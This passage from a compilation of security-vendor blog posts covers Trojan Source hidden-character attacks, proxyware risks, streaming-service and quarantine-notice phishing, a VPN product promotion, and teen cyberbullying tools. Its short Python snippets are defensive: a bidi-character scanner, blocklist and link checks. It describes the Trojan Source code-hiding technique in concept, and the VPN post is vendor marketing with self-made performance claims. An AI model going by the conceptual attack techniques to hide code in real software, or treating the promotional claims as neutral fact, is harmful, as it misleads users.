    At first glance, the vulnerability seems too simple. Who would insert invisible characters, hoping to deceive source code auditors? Nevertheless, the problem was deemed serious enough to warrant a vulnerability identifier (CVE-2021-42574). Before publishing the paper, the authors notified the developers of the most common compilers, giving them time to prepare patches.

    The report outlines the basic attack capabilities. The two main execution strategies are to hide a command inside a comment and to hide one inside a string literal that looks harmless on-screen. It is possible, in theory, to achieve the opposite effect: to create code that looks like a command but is in fact part of a comment and will not be run. Even more creative methods of exploiting this weakness are bound to exist.

    For example, someone could use the trick to carry out a sophisticated supply-chain attack whereby a contractor supplies a company with code that looks correct but doesn’t work as intended. Then, after the final product is released, an outside party can use the “alternative functionality” to attack customers.

    How dangerous is it, really?

    Shortly after the paper was published, programmer Russ Cox critiqued the Trojan Source attack. He was, to put it mildly, unimpressed. His arguments are as follows:

    • It is not a new attack at all;
    • Many code editors use syntax highlighting to show “invisible” code;
    • Patches for compilers are not necessary — carefully checking the code to detect any accidental or malicious bugs is sufficient.

    Indeed, the problem with Unicode control characters surfaced, for example, way back in 2017. Also, a similar problem with homoglyphs — characters that look the same but have different codes — is hardly new and can also serve to sneak extraneous code past manual checkers.

    However, Cox’s critical analysis does not deny the existence of the problem, but rather condemns reports as overdramatic — an apt characterization of, for example, journalist Brian Krebs’ apocalyptic ‘Trojan Source’ Bug Threatens the Security of All Code.

    The problem is real, but fortunately the solution is quite simple. All patches already out or expected soon will block the compilation of code containing such characters. (See, for example, this security advisory from the developers of the Rust compiler.) If you use your own software build tools, we recommend adding a similar check for hidden characters, which should not normally be present in source code.
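
    If you maintain your own build pipeline, a check like that is easy to script. Here is a minimal Python sketch (the file pattern and paths are assumptions for illustration) that scans source files for the Unicode directional formatting characters abused in this class of attack and reports where they occur.

        import pathlib
        import sys

        # Directional formatting characters abused in Trojan Source-style reordering
        BIDI_CONTROLS = {
            "\u202A", "\u202B", "\u202C", "\u202D", "\u202E",   # LRE, RLE, PDF, LRO, RLO
            "\u2066", "\u2067", "\u2068", "\u2069",             # LRI, RLI, FSI, PDI
        }

        def scan_file(path: pathlib.Path) -> bool:
            found = False
            text = path.read_text(encoding="utf-8", errors="replace")
            for lineno, line in enumerate(text.splitlines(), start=1):
                hits = [c for c in line if c in BIDI_CONTROLS]
                if hits:
                    found = True
                    codes = ", ".join(f"U+{ord(c):04X}" for c in hits)
                    print(f"{path}:{lineno}: bidi control character(s) found: {codes}")
            return found

        if __name__ == "__main__":
            root = pathlib.Path(sys.argv[1]) if len(sys.argv) > 1 else pathlib.Path(".")
            suspicious = False
            for source_file in root.rglob("*.py"):     # adjust the pattern to your languages
                suspicious |= scan_file(source_file)
            sys.exit(1 if suspicious else 0)           # a non-zero exit can fail a CI job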

    The danger of supply-chain attacks

    Many companies outsource development tasks to contractors or use ready-made open-source modules in their projects. That always opens the door to attacks through the supply chain. Cybercriminals can compromise a contractor or embed code in an open-source project and slip malicious code into the final version of the software. Code audits typically reveal such backdoors, but if they don’t, end users may get software from trusted sources but still lose their data.

    Trojan Source is an example of a far more elegant attack. Instead of trying to smuggle megabytes of malicious code into an end product, attackers can use such an approach to introduce a hard-to-detect implant into a critical part of the software and exploit it for years to come.

    How to stay safe

    To guard against Trojan Source–type attacks:

    • Update all programming language compilers you use (if a patch has been released for them), and
    • Write your own scripts that detect a limited range of control characters in source code.

    More broadly, the fight against potential supply-chain attacks requires both manual code audits and a range of automated tests. It never hurts to look at your own code from a cybercriminal perspective, trying to spot that simple error that could rupture the whole security mechanism. If you lack the in-house resources for that kind of analysis, consider engaging outside experts instead.

    View the full article

  20. Imagine getting paid for access to just a tiny portion of your Internet bandwidth at work. Sounds pretty sweet, doesn’t it? The computer is on all the time anyway, and you have unlimited Internet access, so why not? It’s not even your own resources, just corporate equipment and bandwidth.

    That all sounds simple, but you don’t have to look too closely to see that when you agree to install a proxyware client on a work computer, it’s not harmless at all. Install proxyware and you’re exposing your corporate network to risks that far outweigh any income you might earn from the deal. To put it bluntly, no other questionable Internet money-making scheme comes with such a variety of undesirable consequences. Today we explain why proxyware is dangerous.

    What is proxyware?

    Researchers at Cisco Talos coined the term proxyware and have reported on the phenomenon in depth. Essentially, a proxyware service acts as a proxy server. Installed on a desktop computer or smartphone, it makes the device’s Internet connection accessible to an outside party. Depending on how long the program remains enabled and how much bandwidth it is permitted to use, the client accumulates points that can eventually be converted into currency and transferred to a bank account.
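
    To picture the mechanism, here is a minimal Python sketch, with a placeholder proxy address, showing how ordinary Web traffic can be routed through someone else's connection; that borrowed connection is exactly what proxyware "tenants" pay for.

        import urllib.request

        # Placeholder proxy endpoint; with proxyware installed, your machine plays this role
        proxy = urllib.request.ProxyHandler({
            "http": "http://198.51.100.7:8080",
            "https": "http://198.51.100.7:8080",
        })
        opener = urllib.request.build_opener(proxy)

        # From the website's point of view, this request comes from the proxy's
        # IP address, not from the machine that actually sent it.
        with opener.open("http://example.com") as response:
            print(response.status, response.getheader("Content-Type"))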

    Of course, these kinds of services do not have to be used for illegal purposes, and they do have some legitimate applications. For example, some appeal to the marketing departments of large companies, which need as many Web entry points as possible in different geographic regions.

    Why proxyware on a company computer is a bad idea

    Although proxyware services claim their “tenants” are harmless, problems still occur, ranging from IP address reputation damage to software reliability issues.

    IP address reputation damage

    The most common problem for the users of computers running proxyware (or even for an entire network sharing a single IP address) is that they encounter CAPTCHAs far more often, the entire point of which is to ensure that only real humans get access to an online resource. A computer running proxyware raises suspicions, and rightly so.

    One way bandwidth tenants can use proxyware-laden computers is to scan the Web or measure the speed of website access by regularly deploying a flood of requests. Automatic DDoS protection systems do not like that. It can also be a sign of something even more shady, such as spam mailings.

    Keep in mind that the consequences can be much more dire for the company, with automated requests landing the organization’s IP address on a list of unsafe addresses. So, for example, if the e-mail server operates on the same address, at some point the employees’ messages may stop reaching external recipients. Other e-mail servers will simply start blocking the organization’s IP address and domain.
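
    If you suspect your organization's address has already been flagged, a quick query against a DNS-based blocklist will tell you. The Python sketch below checks one well-known blocklist by reversing the IP address; the zone and the IP shown are examples only, and heavy or commercial use of public blocklists may require a subscription.

        import socket

        def is_listed(ip: str, zone: str = "zen.spamhaus.org") -> bool:
            # DNSBLs are queried by reversing the IP octets and appending the zone
            reversed_ip = ".".join(reversed(ip.split(".")))
            query = f"{reversed_ip}.{zone}"
            try:
                socket.gethostbyname(query)     # any answer means the address is listed
                return True
            except socket.gaierror:             # NXDOMAIN: not listed (or the lookup failed)
                return False

        print(is_listed("203.0.113.5"))         # documentation-range IP, used here as an example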

    Fake proxyware clients

    Another risk employees take in installing proxyware is that they may download something they didn’t mean to. Try this little experiment: Go to Google and search for “honeygain download.” You’ll get a couple of links to the developer’s official website and hundreds to unscrupulous file-sharing sites, half of which include “bonus content” with their downloads.

    What kinds of bonus content? Well, researchers describe one such trojanized installer as deploying a cryptocurrency-mining program (which devours a PC's resources and electricity) and a tool that connects to the cybercriminals' command server, from which anything else can be downloaded at any time.

    That kind of proxyware can take down an organization’s entire IT infrastructure. It could also lead to ransomware encrypting data, ransom demands, and more. In sum, proxyware is a grab bag of dangers for a business.

    Covert installation of proxyware

    Most scenarios resemble the above: unintended consequences of purposeful (if sometimes unauthorized) installations. The converse sometimes happens as well, with an employee catching actual malware on a shady site, and that malware installing a modified proxyware client on the computer. That’s nothing but trouble: slowed computers, less network bandwidth, and, potentially, data theft.

    Recommendations for businesses

    Your best way to combat criminal exploitation through proxyware is to install a reliable antivirus solution on every computer that has Internet access. Not only will that protect your company from the harmful effects of proxyware, but if said proxyware includes, or is included with, other malware, you’ll still be covered.

    To be clear, even “clean” proxyware is not much better. A sound security policy should not allow anyone to install proxyware or any other questionable software on employees’ computers, regardless of whether the computers are in the office or employees are connecting to the organization’s VPN. As a rule, most employees do not need, and should not be allowed, to install software on their computers independently.

    View the full article

  21. This week on the Kaspersky Transatlantic Cable podcast, we take a look at some serious stories, including news of REvil arrests.

    To kick off the conversation, Dave, Jeff, and Ahmed jump on news that some folks on Twitter are trying to be good cops, hunting down cryptoscammers in the DeFi (decentralized finance) world, but not all is as it appears. From there, discussion moves on to how a scammer was able, briefly, to hit the number one spot in Google results for “OpenSea” — which is a legitimate site for the trading of NFTs. As ever, be wary of clicking without checking!

    Finally, to wrap up, the team looks at two stories about ransomware: the first on the return of Emotet, and the second on the recent arrest of an affiliate of the REvil ransomware gang.

    If you liked what you heard, please consider subscribing and sharing with your friends. For more information on the stories we covered, see the links below:

    View the full article

  22. Movies and TV shows have been a huge source of comfort for many in these COVID times, and the number of new shows on Netflix, Amazon Prime, and the like has skyrocketed. But when searching for the latest megahit, don’t neglect basic security measures or you might find that someone else is enjoying it at your expense — or worse, that the money in your bank account has evaporated.

    It’s more fun to ponder what to watch next than to dig through security settings, but attackers are ready and waiting to siphon off your personal and payment information.

    Phishing bait

    Streaming services offer a variety of payment plans, but generally they all involve paying with a credit card. And where there are card details, there is phishing. What’s more, newbies and seasoned account holders may experience different forms of bait. We collected some examples from users who agreed to share threat information.

    “Subscribe now!”

    To sign up for a streaming service, you need a valid e-mail address; and to pay, you need some form of online payment such as a credit card or PayPal account. (If you plan to watch Apple TV, you’ll also need an Apple ID.)

    Unsurprisingly, cybercriminals have created fake sign-up pages to net all of those goodies in one go. Armed with your info, they can withdraw or spend your money right away; your e-mail address should come in handy for future attacks.

    In the example below, the fake site is not very convincing. Can you spot the phishing signs?

    Fake Netflix sign-up page

    “Refresh data”

    If you already have a paid subscription, then attackers will threaten to block it, assuming, logically, that you value it. Here’s an e-mail from “friends at Netflix,” telling the recipient to update or confirm payment details or they’ll close the account. And it includes a big, red button. Don’t rush to click that — remember what happens in the movies when they push the big, red button?

    “Dear costumer, please update your account”

    The link takes you to a payment confirmation page.

    Now, many phishing messages contain such obvious mistakes as addressing “costumers,” but take the form below as an example that actually looks plausible. It has no spelling mistakes or weird design elements, but the inattentive user who falls for it could lose money from their bank account.

    Fake Netflix website prompts to enter personal and banking data, allegedly for account reactivation

    A dangerous premiere

    In the example below, cybercriminals used popular shows to attract fans who didn’t have subscriptions, offering them the opportunity to watch the shows on the fake website.

    This unofficial page invites fans to watch or download The Mandalorian

    As a teaser, they show a short clip, which they sometimes try to pass off as a new, previously unaired episode. More often than not, it is cut from trailers that have long been in the public domain. Intrigued victims are then asked to buy a low-cost subscription to continue watching. What follows is a classic scenario: any payment details users enter go straight to the crooks, and the never-before-seen episode remains just that, never seen.

    No longer your account

    Cybercriminals are interested in more than bank account details; account credentials for streaming services are also hot. Because hijacked accounts with paid subscriptions get put up for sale on the dark web, you could log in one day and discover someone else is already there.

    After all, depending on your Netflix plan, you can stream on 1–4 devices simultaneously, and cybercriminals can sell your login credentials to any number of streamers. That means you might find yourself having to wait in line until some stranger decides to sign out.

    This fake Netflix login page looks just like the real one

    That may not be the end of it, either: many people use the same password for different accounts, and databases of stolen passwords die hard. If the password is the same everywhere, a victim need only enter it on a phishing page once to put all of their accounts at risk.

    Buy a subscription for yourself, not cybercriminals

    Cybercriminals scam movie and TV show lovers in different ways. Some of their ruses are quite easy to spot, others less so. By following simple digital security rules, you can protect your data not only in online movie theaters, but elsewhere as well.

    • Do not click links in e-mails, even if a message seems to be from a real streaming (or other) service; always go to the official website by entering the address manually or through the app;
    • Do not trust any person or site promising viewings of movies or shows before the official premiere;
    • Pay attention to red flags that warn of phishing e-mails or fake websites;
    • Stay alert and read more about scams and phishing schemes to learn how to sense which e-mails and websites are trustworthy, and which you should avoid;
    • Use different passwords for all accounts that you value, and use a password manager to remember them for you;
    • Use a reliable security solution that identifies malicious attachments and blocks phishing websites.

    View the full article

  23. What do you do when an unsolicited e-mail lands in your work inbox? Unless you're a spam analyst, you will most likely just delete it. Paradoxically, that's exactly what some phishers want you to do, and as a result, our mail traps have lately been seeing more and more e-mails that appear to be notifications about obviously unwanted messages.

    How it works

    Counting on users' limited knowledge of antispam technologies, cybercriminals send company employees notifications about e-mails that allegedly arrived at their address and were quarantined. Such messages look something like this:

    Fake notification about quarantined e-mails.

    The choice of topic is generally unimportant; the attackers simply mimic typical ads for unsolicited goods and services and provide buttons for deleting or keeping each message. The notification also offers options to delete all quarantined messages at once or to open the mailbox settings. Users even receive visual instructions:

    Visual instructions sent by scammers.

    What’s the catch?

    The catch, of course, is that the buttons are not what they seem. Behind every button and hyperlink lies an address that brings the clicker to a fake login page, which looks like the Web interface of the mail service:

    Phishing site.

    The message “Session Expired” is meant to persuade the user to sign in. The page serves one purpose, of course: to harvest corporate mail credentials.

    Clues

    In the e-mail, the first thing that should set alarm bells ringing is the sender’s address. If the notification were real, it would have to have come from your mail server, which has the same domain as your mail address, not, as in this case, from an unknown company.

    Before clicking any links or buttons in any message, check where they point by hovering the mouse cursor over them. In this case, the same link is stitched into all active elements, and it points to a website that has no relation to either the domain of the recipient or the Hungarian domain of the sender. That includes the button that supposedly sends an “HTTPs request to delete all messages from quarantine.” The same address should serve as a red flag on the login page.
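
    The same hover check can be automated. The hypothetical Python sketch below (the file name is a placeholder, and the heuristic is deliberately crude) extracts the links from a saved .eml message and flags any whose domain does not match the sender's.

        import email
        import re
        from email.policy import default
        from urllib.parse import urlparse

        with open("suspicious.eml", "rb") as f:                 # placeholder file name
            msg = email.message_from_binary_file(f, policy=default)

        # Take the domain part of the From: header, e.g. "example.com"
        sender_domain = str(msg["From"]).split("@")[-1].strip("> ").lower()

        # Prefer the HTML part, fall back to plain text
        body_part = msg.get_body(preferencelist=("html", "plain"))
        body = body_part.get_content() if body_part else ""

        for url in re.findall(r'https?://[^\s"\'<>]+', body):
            link_domain = urlparse(url).netloc.lower()
            if not link_domain.endswith(sender_domain):
                print(f"Suspicious link: {url} (sender domain: {sender_domain})")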

    How to avoid spam and phishing

    To avoid getting hooked, corporate users need to be familiar with the basic phishing playbook. For this, look no further than our online security awareness platform.

    Of course, it is better to prevent encounters between end users and dangerous e-mails and phishing websites in the first place. For that, use antiphishing solutions both at the mail server level and on users' computers.

    View the full article

  24. Millions of people around the world already use a VPN app (and if you're not one of them, now's the time to try). Some do so to protect the data they transfer; others want to hide their IP address or virtually change location, for example to watch movies and TV shows that are not available in their country. Every one of those core features is important, and we never stop working to ensure that Kaspersky VPN Secure Connection handles them all perfectly. In this post, we're diving into the latest updates to our application.

    More choice, more speed

    One of the most important parameters of a VPN connection is speed. In terms of data transfer speed, Kaspersky VPN Secure Connection is a market leader, as independent reports confirm. Our solution handles streaming video, downloading files, and connecting to game servers particularly well.

    Normally, the closer you are to the server, the faster the connection. That’s why we continually expand our network of servers, with excellent results: in the past year alone our server count has grown to 2,000, and with servers across 55 countries you are sure to find a super-fast connection.

    What’s more, to achieve maximum speed, you don’t need to choose manually from a list of options — the paid version of the app automatically determines which server offers the best connection speed and connects to it. If the automatic selection doesn’t suit you, you can connect to another point, choosing a country or even a particular city.

    Content from any country is always available

    If you subscribe to Netflix but miss your favorite TV shows because they aren’t available in your country, Kaspersky VPN Secure Connection lets you watch that content too. You just have to connect to the right server.

    Our solution lets you select not only countries, but also streaming platforms. In addition to Netflix, you can enjoy local content from Amazon Prime Video, HBO Max, Hulu, Disney+, and BBC iPlayer as if you were physically in the US, UK, Germany, or Japan.

    New features to keep you safe

    It should go without saying that your security remains our top priority. To ensure your protection at all times, Kaspersky VPN Secure Connection turns on automatically when you connect to public networks or run certain programs, such as banking apps. The solution applies AES-256 encryption to all traffic to prevent data interception.

    And when we say all traffic, we mean every byte of data: The Kill Switch feature blocks data transmission until a secure connection is established and prevents all interception attempts in any situation — for example, when you connect to a hotspot and your device comes online, but the data transmission channel is not yet secure.
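
    As a purely conceptual illustration of those two ideas (this is not Kaspersky’s code; the tunnel_is_up check is a made-up placeholder, and the example uses the third-party cryptography package), the sketch below encrypts a payload with AES-256-GCM and refuses to transmit anything until the tunnel is reported as up:

        import os
        from cryptography.hazmat.primitives.ciphers.aead import AESGCM

        KEY = AESGCM.generate_key(bit_length=256)  # 256-bit key, i.e. AES-256

        def tunnel_is_up():
            # Placeholder: a real client would query the VPN interface or API here.
            return False

        def send_securely(payload):
            # Kill-switch behavior: no secure tunnel, no transmission at all.
            if not tunnel_is_up():
                raise RuntimeError("VPN tunnel is down; blocking transmission")
            nonce = os.urandom(12)  # 96-bit nonce, unique per message
            ciphertext = AESGCM(KEY).encrypt(nonce, payload, None)
            return nonce + ciphertext  # only encrypted bytes ever leave the device

    In the actual application, of course, none of this requires any code from the user.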

    We have supplemented Kaspersky VPN Secure Connection with the ability to set up a secure connection not only directly on your phone or laptop, but also on the router, using the built-in OpenVPN client. In such cases, the solution automatically protects traffic sent from all devices in your network, meaning you don’t have to configure the service for each individually. It also means that the secure connection will work for your smart TV, letting you watch content available only in other countries.

    Now you can also use our secure connection on any device that supports an OpenVPN client, which covers, for example, Linux machines and Chromebooks in addition to smart TVs with Android TV or Fire TV.
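
    On a Linux machine, for example, the connection can be brought up with the stock OpenVPN client. The snippet below is only a sketch: it assumes your subscription lets you export an OpenVPN profile (saved here under the hypothetical name client.ovpn) and simply launches the standard client with it:

        import subprocess

        def connect(profile="client.ovpn"):
            # --config is a standard OpenVPN option; creating the tun interface
            # usually requires root privileges, hence sudo.
            subprocess.run(["sudo", "openvpn", "--config", profile], check=True)

        if __name__ == "__main__":
            connect()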

    Trust and privacy

    When it comes to privacy, trust in the makers of your security solution is paramount. What information do the developers collect about you? How do they use it? If a company is not ready to answer these questions, think twice before placing your safety in its hands.

    Kaspersky has been in the information security market for almost 25 years. We maintain maximum operational transparency and do not collect unnecessary data. In particular, Kaspersky VPN Secure Connection does not store your IP address beyond the current session, never records your Internet activity, and does not retain your name or e-mail address.

    Our recent report on data processing describes in detail how and what we collect, store, and process; and, in line with the highest security standards, we reliably protect all of the user information we receive.

    The trust of our millions of users worldwide is very important to us, and their feedback helps us further develop our applications. This approach is bearing fruit: Kaspersky VPN Secure Connection scores 4.5 out of 5 on Google Play and 4.7 out of 5 in the App Store based on thousands of reviews. Reviews in specialized publications also confirm the superior protection of our solutions and the openness of our data-processing policy.

    Security that doesn’t break the bank

    Change is good, but so is stability. Therefore, we left some things unaltered: as before, Kaspersky VPN Secure Connection costs less than most other solutions in its class.

    A completely free version of our solution is also available. It limits daily traffic and lacks some advanced features such as server selection and Kill Switch but still does a great job of protecting your connection.

    View the full article

  25. We recently observed World Mental Health Day, an international observance that highlights the importance of mental health in an effort to bring about positive change. Adolescents’ mental health deserves extra attention in the era of social media, which has raised questions about psychological addiction and other problems.

    Social media anxiety

    A recent Facebook study found that Instagram can harm the psyche of teens, especially girls. Thirty-two percent of teenage girls said that when they felt bad, Instagram made them feel even worse. Among the frequently cited causes of stress were unrealistic standards of beauty and feelings of inadequacy about their standard of living compared with what they saw on screen.

    Instagram is trying to deal with some of these problems by introducing features such as the option to hide the likes counter and a ban on filters that promote unrealistic beauty standards.

    There are also simple steps users can take:

    • Unfollow accounts that make you feel sad, inadequate, insecure, or upset.
    • Try to reduce the amount of time you spend online.
    • Take small breaks and digitally detox to escape from social networks, relax, and focus on yourself. Kaspersky has launched a digital CyberSpa space to help you do this.

    Cyberbullying

    Cyberbullying is another well-known issue that can affect a teen’s mental health. Whenever it happens, it should not be tolerated or ignored.

    If a teen is being bullied online, the first step is to seek help from parents or other trusted adults like a school counselor, sports coach or teacher. If the victim is uncomfortable telling friends about the problem, they can contact a helpline and talk to a professional consultant.

    Today, social networks, including Instagram, actively use AI to combat abusive comments under pictures and videos. Each social platform also has tools to customize who can comment on or view your posts, as well as to block users and report cases of bullying or intimidation. It can also sometimes be useful to collect evidence in the form of screenshots to confirm what is happening.

    Facebook

    Facebook has developed an Anti-Bullying Center for Teens. To fight against bullying on Facebook you can:

    • Track who tags you in their content. This can be done in the Timeline and Tagging settings.
    • Review posts you have already been tagged in and, if necessary, remove the tags from content you do not want to be associated with, using the Activity Log.
    • Remove aggressors from your friends list so that they cannot contact you. If unfriending them does not help, you can block them; they will not be notified. Blocking prevents abusers from finding your profile, tagging you in content, adding you as a friend, or tracking your activity.
    • Be sure to report offensive material. You can report a post, photo, or comment directly next to it; this will draw the attention of Facebook moderators.

    Instagram

    Instagram monitors the content its users post: if the platform detects a possible violation, it notifies the user that they are about to publish something that crosses the line. Instagram users can take other steps of their own as well.

    Twitter

    Twitter also has an Online Bullying help center offering advice and support. Here are some steps Twitter users can take to fight bullying:

    • Use Twitter’s expanded notification filters. These allow you to filter the accounts from which you receive notifications; for example, you can choose not to receive notifications from accounts without a profile picture.
    • Customize Twitter’s mute options to suit your needs. For instance, you can mute notifications for specific keywords or entire phrases, and you can do so for a day, a month, or indefinitely.
    • Another effective step is blocking users. Blocked accounts cannot contact you, see your tweets, or read your feed.
    • If you are a victim of bullying, also report the offending content. This allows Twitter to take action and block the user or the content.

    TikTok

    TikTok is also developing various tools that allow users to limit unwanted attention. The company has produced a guide that helps users identify bullying behavior and take measures against it. Here are some features teens can use:

    • Configure video privacy settings on a personal account to choose who can view each video and to restrict access to personal videos.
    • The comment filter lets you create a list of unwanted keywords that will be blocked in comments on videos and during live broadcasts, protecting users from bullying.
    • The Duet setting lets you choose who can create a Duet with your videos.
    • Blocking lets you cut off bullies who violate the community rules and report their actions to the platform.
    • Family settings help keep teens safe and support their creative endeavors without violating personal boundaries.

    In social media’s relatively short history, we’ve learned that it isn’t always good for our mental health, even though it has other benefits. But by taking advantage of some of the tools at our disposal, we can take matters into our own hands and help guide teens down a healthier path.

    View the full article
